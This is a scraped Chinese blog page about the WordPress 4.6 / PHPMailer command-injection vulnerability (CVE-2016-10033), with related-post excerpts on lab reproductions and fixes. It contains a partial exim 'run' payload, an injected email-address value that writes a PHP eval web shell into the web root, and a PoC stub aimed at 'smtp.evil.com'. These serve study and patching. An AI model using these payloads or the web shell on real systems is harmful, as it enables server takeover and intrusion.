WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)

最新推荐文章于 2025-03-06 11:11:13 发布
最新推荐文章于 2025-03-06 11:11:13 发布
阅读量4.8k 收藏 9
点赞数 3
分类专栏: CVE 文章标签: WordPress 命令执行漏洞 CVE 渗透测试 PHPMailer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/csacs/article/details/86776080
版权
本文详细介绍了WordPress 4.6版本中由于PHPMailer组件引发的命令执行漏洞(CVE-2016-10033)。攻击者可利用此漏洞在服务器上执行任意命令,通过构造特定payload并篡改找回密码邮件的host值。漏洞影响WordPress 4.6.0及更低版本,以及PHPMailer 5.2.18之前的版本。修复措施包括更新WordPress和PHPMailer到最新版本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)

漏洞概述:

  • 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。

漏洞版本:

  • WordPress <= 4.6.0
  • PHPMailer < 5.2.18

漏洞原理:

  • 主要是phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。

漏洞搭建:

漏洞复现:

  • 首先进行payload构造:
aa(any -froot@localhost -be ${run{/bin/touch /
最低0.47元/天 解锁文章
CVE-2016-10033PHPMailer 远程代码执行漏洞
weixin_45253622的博客
06-23 2293
漏洞简介 PHPMailer是一个非常强大的 php发送邮件类,可以设定发送邮件地址、回复地址、邮件主题、html网页,上传附件,并且使用起来非常方便。 PHPMailer由于钓鱼系统sendmail命令,并且没有对输入做限制,攻击者可以通过利用 –X 参数把恶意代码写入 PHP 文件,达到执行命令的效果。 PHPMailer百度百科 利用条件 :PHP没有开启safe_mode(默认) 影响版本 :<5.2.18版本 漏洞复现 1.启动docker服务 service docker start 2
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
谢公子的博客
04-05 2215
PHPMailer是一个基于PHP语言的邮件发送组件,被广泛运用于诸如WordPress、Drupal、1CRM、SugarCRM、Yii、Joomla等用户量巨大的应用与框架中。 CVE-2016-10033PHPMailer中存在的高危漏洞,这个高危漏洞是由 class.phpmailer.php 没有正确处理用户的请求导致的攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造...
【WEB攻防】WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033) 安鸾靶场详细复现 -WordPress1
AAAAAAAAAAAA66的博客
01-04 2187
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 漏洞简介 工具 题
WordPress曝9.8分高危漏洞,可执行远程代码攻击
最新发布
FreeBuf_的博客
03-06 502
鉴于WordPress驱动着全球超过43%的网站,此次漏洞再次凸显了在非营利组织等关键Web基础设施中,严格进行第三方插件审计和自动化补丁管理的必要性。
PHPMailer远程命令执行漏洞溯源
cc_de_csdn的博客
08-25 338
1.打开靶场,找到发送邮件的位置,进入邮件页面 2.填写邮件消息 1.任意用户名 2.在email写入: “aaa”. -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com 3.在message写入: <?php @eval($_POST[a]);?> 3.使用菜刀连接,链接是:http://219.153.49.228:4105...
WordPress 远程执行代码漏洞 CVE-2016-10033 漏洞复现
ADummy的博客
03-02 1020
WordPress 4.6远程执行代码漏洞(PwnScriptum) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>远程代码执行 0x01漏洞介绍 ​ 参考链接的有效负载不完整。深入阅读代码后,我发现只有在1.920之前不存在主体的用户参数时,才能执行命令,而在1.920处没有限制。 ​ 影响版本 Webmin < 1.920 0x02漏洞复现 ​ 访问http://your-ip:8080/,设置管理员用户名和密码以使用它(数据库已配置且不会自
PHPMailer 任意文件读取漏洞CVE-2017-5223)
EC_Carrot的博客
07-20 719
漏洞详细 PHPMailer在发送邮件的过程中,会在邮件内容中寻找图片标签,即<img>,并将其src属性的值提取出来作为附件。 所以,如果我们能控制部分邮件内容,可以利用将文件/etc/passwd作为附件读取出来。 原理参考:https://www.seebug.org/vuldb/ssvid-92617 影响范围 PHPMailer < 5.2.21 漏洞复现 我环境启动不了,但是我会根据vulhub的实战文章讲讲。 在“意见反馈”页面,正常用户填写昵称、邮箱、意见提交,后端会返回
WordPress<=4.6 RCE(CVE-2016-10033)
jammny
10-24 672
前言 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 漏洞详情 wordpress使用phpmailer组件进行重置密码邮件的发送,但是phpmailer < 5.2.18之前的版本存在命令注入漏洞WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击
php5.2漏洞,PHPMailer < 5.2.18 远程代码执行(CVE-2016-10033漏洞分析
weixin_31188927的博客
03-11 832
Author: p0wd3r, dawu (知道创宇404安全实验室)Date: 2016-12-270x00 漏洞概述1.漏洞简介Dawid Golunski 在圣诞节当天发布了一个漏洞报告,报告中表明 PHPMailer 小于5.2.18的版本存在远程代码执行漏洞。成功利用该漏洞后,攻击者可以远程任意代码执行。许多知名的 CMS 例如 Wordpress 等都是使用这个组件来发送邮件,影响不可...
phpmailer 私密抄送_PHPMailer又被发现严重漏洞 危及数百万网站
weixin_31346703的博客
12-23 188
近日,波兰安全研究员Dawid Golunski在开源PHPMalier发现了严重安全漏洞(CVE-2016-10033),它能允许攻击者在Web服务器上远程执行任意代码,入侵目标Web应用程序。PHPMailer是一款流行的开源PHP库,被全球超过900万的用户用于发送邮件。全球有数百万的PHP网站和开源Web应用程序(包括WordPress、Drupal、1CRM、SugarCRM、Yii、J...
Vulhub靶场WordPress4.6命令执行(PwnScriptum)漏洞复现
X_python321的博客
07-11 865
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞
PHPMailer 任意文件读取漏洞CVE-2017-5223)复现
SoulCat
05-29 1851
你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切
Wordpress 4.6 任意命令执行漏洞
m0_63241485的博客
08-17 1235
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,需要你有一定的专业知识。WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus中文语言包。...
php查看邮件漏洞,PHPMailer任意文件读取漏洞分析(CVE-2017-5223)
weixin_42100129的博客
03-11 353
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:Yxlink,本文属FreeBuf原创奖励计划,未经许可禁止转载PHPMailer是堪称全球最流行邮件发送类,其全球范围内的用户量大约有900万,被诸多开源项目所采用,包括WordPress、Drupal、1CRM、Joomla!等。铱迅安全团队于2017年1月6日发...
漏洞情报 | PHPMailer 多个远程代码执行漏洞
爱国小白帽
06-18 622
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 PHPMailer是一个用于发送电子邮件的PHP类库。 2021年6月18日,360漏洞云监测到PHPMailer 6.5.0之前的版本存在多个远程代码执行漏洞CVE-2021-34551:该漏洞源于在处理$lang_path参数时对setLanguage()方法内用户提供数据的验证不足,远程攻击者可向应用传送一个特殊构造的输入,通过受影响的参数设置UNC路径,从而在系统上执行任意PHP代码。 CVE-2021-3603:该该漏洞
经典CVEPHPMailer 远程命令执行漏洞
zh的博客
10-15 586
靶场地址:http://whalwl.site:8038/ 解题准备:了解PHPMailer 远程命令执行漏洞的利用方法 解题思路: 1、在右键发送页面,构造一句话 2、提示发送失败,但其实一句话已经完成 3、 尝试访问一句话,成功 4、蚁剑连接成功,去找flag把 ...
PHPMailer 任意文件读取漏洞
帅醉了的博客
11-20 522
CVE-2017-5223 POC <?php # Author:Yxlink require_once('PHPMailerAutoload.php'); $mail = new PHPMailer(); $mail->IsSMTP(); $mail->Host = "smtp.evil.com"; $mail->Port = 25; $mail->SMTPAuth = true; $mail->CharSet = "UTF-8"; $mail->E
wordpress4.6文件上传漏洞
01-20
### 关于WordPress 4.6 文件上传安全漏洞 对于WordPress 4.6 版本中存在的文件上传安全漏洞,主要关注的是PHPMailer组件引入的命令执行漏洞CVE-2016-10033),该漏洞允许攻击者通过特定条件下发送恶意请求来实现远程代码执行[^1]。 #### 安全漏洞详情 此漏洞源于`wp-includes/class-phpmailer.php`中的`class phpmailer`类,在处理邮件附件时未能充分验证用户输入的数据。当应用程序尝试解析含有特殊字符构造的邮箱地址字符串作为收件人参数传递给sendmail程序调用时,则可能触发本地命令注入风险[^5]。 #### 解决方案与修复措施 为了防止此类攻击的发生并保护站点免受潜在威胁的影响: 1. **升级版本** 推荐尽快将WordPress更新至最新稳定版,官方已经在后续发行中修正了这个问题。保持软件处于最新的状态是预防已知漏洞的最佳实践之一。 2. **应用补丁** 如果由于某些原因无法立即进行全面升级,可以考虑单独打上针对这个具体问题的安全补丁。这通常涉及替换受影响的核心文件或安装由社区提供的专门用于修补这一缺陷的插件。 3. **加强配置安全性** 修改服务器端设置以增强防护能力,比如调整php.ini里的open_basedir限制路径访问范围;关闭不必要的功能和服务减少暴露面;启用防火墙规则阻止异常流量等。 4. **定期备份数据** 建立健全的数据恢复机制非常重要,即使遭遇入侵也能迅速恢复正常运营而不会造成不可挽回损失。 ```bash # 更新Wordpress到最新版本 sudo wp core update --force ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值